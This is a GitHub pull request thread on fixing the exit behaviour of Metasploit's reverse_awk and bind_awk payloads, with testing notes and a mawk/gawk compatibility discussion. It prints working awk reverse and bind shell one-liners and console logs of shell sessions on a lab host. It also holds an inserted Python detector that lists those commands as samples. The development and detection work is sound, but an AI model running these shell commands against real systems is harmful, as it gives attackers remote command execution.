
Fix #14510, fix reverse_awk and bind_awk exit behavior #14515

Merged
merged 2 commits into from
Jan 8, 2021

Conversation

timwr
Contributor

@timwr timwr commented Dec 14, 2020

This fixes #14510
Thanks for reporting @egypt!

Verification

  • use payload/cmd/unix/reverse_awk
  • generate -f raw
  • copy the command
  • to_handler
  • paste the command into a terminal somewhere
  • interact with the session: sessions -1
  • id or something to make sure it's real
  • exit or ctrl-c
  • see the session close
  • repeat for payload/cmd/unix/reverse_awk

Expected behavior

clean exit

Current behavior

If you exit, the payload continues to call back. If you ctrl-c, it doesn't call back anymore but the process is still there.

@bcoles
Contributor

bcoles commented Dec 14, 2020

Works as described on Kali without reintroducing the issues described in #9750. (Edit: I only tested bind, not reverse)

The payload fails to run on Ubuntu 20.04:

$ awk 'BEGIN{s="/inet/tcp/4444/0/0";do{if((s|&getline c)<=0)break;if(c){while((c|&getline)>0)print $0|&s;close(c)}} while(c!="exit")close(s)}'
awk: 1: unexpected character '&'
awk: 1: unexpected character '&'
awk: line 1: syntax error at or near close
awk: line 1: syntax error at or near }

However, it didn't work prior to this change either, presumably due to shipping mawk rather than gawk:

$ awk 'BEGIN{s="/inet/tcp/4444/0/0";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'
awk: 1: unexpected character '&'
awk: 1: unexpected character '&'

Ubuntu 20.04:

$ awk -W version
mawk 1.3.4 20200120
Copyright 2008-2019,2020, Thomas E. Dickey
Copyright 1991-1996,2014, Michael D. Brennan

random-funcs:       srandom/random
regex-funcs:        internal
compiled limits:
sprintf buffer      8192
maximum-integer     2147483647

Kali:

# awk -W version
GNU Awk 5.0.1, API: 2.0 (GNU MPFR 4.1.0, GNU MP 6.2.0)
Copyright (C) 1989, 1991-2019 Free Software Foundation.

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see http://www.gnu.org/licenses/.

@egypt
Contributor

egypt commented Dec 21, 2020

That makes sense. The TCP stack is a GNU extension. I wonder how much portability we would lose by changing the invocation to gawk instead.
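The two comments above make a point a defender can use directly: the `/inet/` special file and the `|&` coprocess operator are gawk extensions, so an awk process whose program text references `/inet/tcp/...` is a strong indicator of network I/O from awk, and it will only work where gawk (not mawk) is the installed awk. The following is an added example, not code from this pull request or from Metasploit: it classifies process command lines (the kind recorded by auditd EXECVE events or `ps -o args`) by the `/inet/` pattern, distinguishes the listening and connect-out shapes by the port/host fields, and classifies `awk -W version` output to tell gawk from mawk. The sample command lines and version strings are constructed here (addresses are documentation ranges), and the function names are this example's own.

```python
import re
import shlex
from os.path import basename

# Interpreter names worth inspecting (assumption: these cover the common awk builds).
AWK_NAMES = {"awk", "gawk", "nawk", "mawk"}

# gawk special-file syntax: /inet/PROTOCOL/LOCAL-PORT/REMOTE-HOST/REMOTE-PORT
INET_RE = re.compile(r'/inet[46]?/(tcp|udp)/(\d+)/([^/"\s]+)/(\d+)')

# Constructed sample command lines (not captured from a real host): the two
# payload shapes discussed in the thread, a benign awk, and a benign gawk that
# uses a plain pipe to getline but no network special file.
SAMPLE_CMDLINES = [
    """awk 'BEGIN{s="/inet/tcp/0/192.0.2.10/4444";do{if((s|&getline c)<=0)break;if(c){while((c|&getline)>0)print $0|&s;close(c)}} while(c!="exit")close(s)}'""",
    """gawk 'BEGIN{s="/inet/tcp/4444/0/0";do{if((s|&getline c)<=0)break;if(c){while((c|&getline)>0)print $0|&s;close(c)}} while(c!="exit")close(s)}'""",
    """awk -F: '{print $1}' /etc/passwd""",
    """/usr/bin/gawk 'BEGIN{while(("date"|getline d)>0)print d}'""",
]


def classify_awk_cmdline(cmdline):
    """Return a finding dict if the command line runs awk with gawk's /inet/
    network special file, otherwise None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None  # unbalanced quotes: not a shell-parsable command line
    if not argv or basename(argv[0]) not in AWK_NAMES:
        return None
    program = " ".join(argv[1:])
    m = INET_RE.search(program)
    if m is None:
        return None
    proto = m.group(1)
    lport, rhost, rport = int(m.group(2)), m.group(3), int(m.group(4))
    # Local port set with remote side 0/0: awk listens (bind shape).
    # Anything else: awk connects out to rhost:rport (reverse shape).
    mode = "bind" if (lport != 0 and rhost == "0" and rport == 0) else "reverse"
    return {
        "interpreter": basename(argv[0]),
        "protocol": proto,
        "mode": mode,
        "local_port": lport,
        "remote_host": rhost,
        "remote_port": rport,
        # '|&' is gawk's coprocess operator; mawk rejects it with
        # "unexpected character '&'", as shown earlier in the thread.
        "uses_coprocess": "|&" in program,
    }


def scan_cmdlines(lines):
    """Run classify_awk_cmdline over many command lines, keeping only findings."""
    return [f for f in (classify_awk_cmdline(line) for line in lines) if f is not None]


def awk_flavor(version_output):
    """Classify the first line of `awk -W version` / `awk --version` output.
    Only gawk implements /inet/ and |&, so only gawk can run such a program."""
    text = version_output.strip()
    first = text.splitlines()[0] if text else ""
    if first.startswith("GNU Awk"):
        return "gawk"
    if first.startswith("mawk"):
        return "mawk"
    return "unknown"


if __name__ == "__main__":
    for finding in scan_cmdlines(SAMPLE_CMDLINES):
        print(finding)
    print(awk_flavor("GNU Awk 5.0.1, API: 2.0 (GNU MPFR 4.1.0, GNU MP 6.2.0)"))
    print(awk_flavor("mawk 1.3.4 20200120\nCopyright 2008-2019,2020, Thomas E. Dickey"))
```

The benign gawk sample is deliberately included: a pipe into `getline` is ordinary awk usage, so the detector keys on the `/inet/` special file rather than on `getline` or `|&` alone, and records `uses_coprocess` only as supporting context.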

@cdelafuente-r7 cdelafuente-r7 self-assigned this Jan 7, 2021
@cdelafuente-r7
Contributor

Thanks @timwr for fixing this! Everything looks good to me.
I was able to reproduce the issue from master and confirmed these changes fixed it. I tested both payloads and verified that the session closes correctly and the awk command terminates with both exit and Ctrl-C on the target. I'll go ahead and land it.

Example output

msf6 > use payload/cmd/unix/reverse_awk
msf6 payload(cmd/unix/reverse_awk) > set LHOST 192.168.144.1
LHOST => 192.168.144.1
msf6 payload(cmd/unix/reverse_awk) > generate -f raw
awk 'BEGIN{s="/inet/tcp/0/192.168.144.1/4444";do{if((s|&getline c)<=0)break;if(c){while((c|&getline)>0)print $0|&s;close(c)}} while(c!="exit")close(s)}'
msf6 payload(cmd/unix/reverse_awk) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.144.1:4444
msf6 payload(cmd/unix/reverse_awk) > [*] Command shell session 1 opened (192.168.144.1:4444 -> 192.168.144.129:36511) at 2021-01-08 14:27:08 +0100

msf6 payload(cmd/unix/reverse_awk) > sessions -1
[*] Starting interaction with 1...

uname -a
Linux ubuntu 5.4.0-54-generic #60~18.04.1-Ubuntu SMP Fri Nov 6 17:25:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.144.129 - Command shell session 1 closed.
msf6 payload(cmd/unix/reverse_awk) >
msf6 payload(cmd/unix/reverse_awk) > [*] Command shell session 2 opened (192.168.144.1:4444 -> 192.168.144.129:35361) at 2021-01-08 14:27:30 +0100

msf6 payload(cmd/unix/reverse_awk) > sessions -1
[*] Starting interaction with 2...

uname -a
Linux ubuntu 5.4.0-54-generic #60~18.04.1-Ubuntu SMP Fri Nov 6 17:25:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 2? [y/N]  y

[*] 192.168.144.129 - Command shell session 2 closed.  Reason: User exit
msf6 payload(cmd/unix/reverse_awk) > use payload/cmd/unix/bind_awk
msf6 payload(cmd/unix/bind_awk) > set RHOST 192.168.144.129
RHOST => 192.168.144.129
msf6 payload(cmd/unix/bind_awk) > generate -f raw
awk 'BEGIN{s="/inet/tcp/4444/0/0";do{if((s|&getline c)<=0)break;if(c){while((c|&getline)>0)print $0|&s;close(c)}} while(c!="exit")close(s)}'
msf6 payload(cmd/unix/bind_awk) > jobs -K
Stopping all jobs...
msf6 payload(cmd/unix/bind_awk) > to_handler
[*] Payload Handler Started as Job 1

[*] Started bind TCP handler against 192.168.144.129:4444
msf6 payload(cmd/unix/bind_awk) > [*] Command shell session 3 opened (0.0.0.0:0 -> 192.168.144.129:4444) at 2021-01-08 14:28:39 +0100

msf6 payload(cmd/unix/bind_awk) > sessions -1
[*] Starting interaction with 3...

uname -a
Linux ubuntu 5.4.0-54-generic #60~18.04.1-Ubuntu SMP Fri Nov 6 17:25:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.144.129 - Command shell session 3 closed.
msf6 payload(cmd/unix/bind_awk) > jobs -K
Stopping all jobs...
msf6 payload(cmd/unix/bind_awk) > to_handler
[*] Payload Handler Started as Job 2

[*] Started bind TCP handler against 192.168.144.129:4444
msf6 payload(cmd/unix/bind_awk) > [*] Command shell session 4 opened (0.0.0.0:0 -> 192.168.144.129:4444) at 2021-01-08 14:29:23 +0100

msf6 payload(cmd/unix/bind_awk) > sessions -1
[*] Starting interaction with 4...

uname -a
Linux ubuntu 5.4.0-54-generic #60~18.04.1-Ubuntu SMP Fri Nov 6 17:25:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 4? [y/N]  y

[*] 192.168.144.129 - Command shell session 4 closed.  Reason: User exit

@cdelafuente-r7 cdelafuente-r7 merged commit 6092fa3 into rapid7:master Jan 8, 2021
@cdelafuente-r7
Contributor

cdelafuente-r7 commented Jan 8, 2021

Release Notes

Fixed an issue with both cmd/unix/reverse_awk and cmd/unix/bind_awk payloads, which were not correctly terminating after a session was closed. This was causing endless session creation and high CPU consumption on the target.

@adfoster-r7 adfoster-r7 added the rn-fix release notes fix label Jan 14, 2021

Successfully merging this pull request may close these issues.

cmd/unix/reverse_awk spins CPU after user exit
5 participants